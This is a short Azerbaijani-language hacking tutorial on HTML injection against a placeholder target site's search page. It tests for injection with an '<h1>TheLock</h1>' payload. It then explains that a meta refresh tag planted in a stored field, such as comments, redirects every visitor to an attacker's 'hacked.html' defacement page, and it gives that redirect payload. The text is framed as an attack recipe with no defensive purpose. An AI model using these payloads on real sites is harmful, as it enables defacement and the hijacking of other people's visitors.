Sayt belədir:
Kod:
http://www.hədəfsayt.com/axtar.php=
e]
Kodumuz:
Kod:
<h1>TheLock</h1>
Kod bu şəkildə artırılacaq:
Kod:
http://www.hədəfsayt.com/axtar.php=<h1>TheLock</h1>
e]
Qarşımıza böyük hərflərlə TheLock yazısının gəldiyini görəcəyik.Bu deməkdir ki burda html injection var.Bura meta ata bilərik.Atdığımız metanı DB-ya qeyd olmadığı üçün sadəcə biz görəcəyik.Amma rəy bildirmək üçün(və buna oxşar yəni db-ya qeyd olunan) hissə tapıb meta atsaq bura girən hərkəs indeximizə yönlənəcək.
Meta kodu:
Kod:
<meta http-equiv="refresh" content="0;URL=http://www.indexlisayt.com/hacked.html">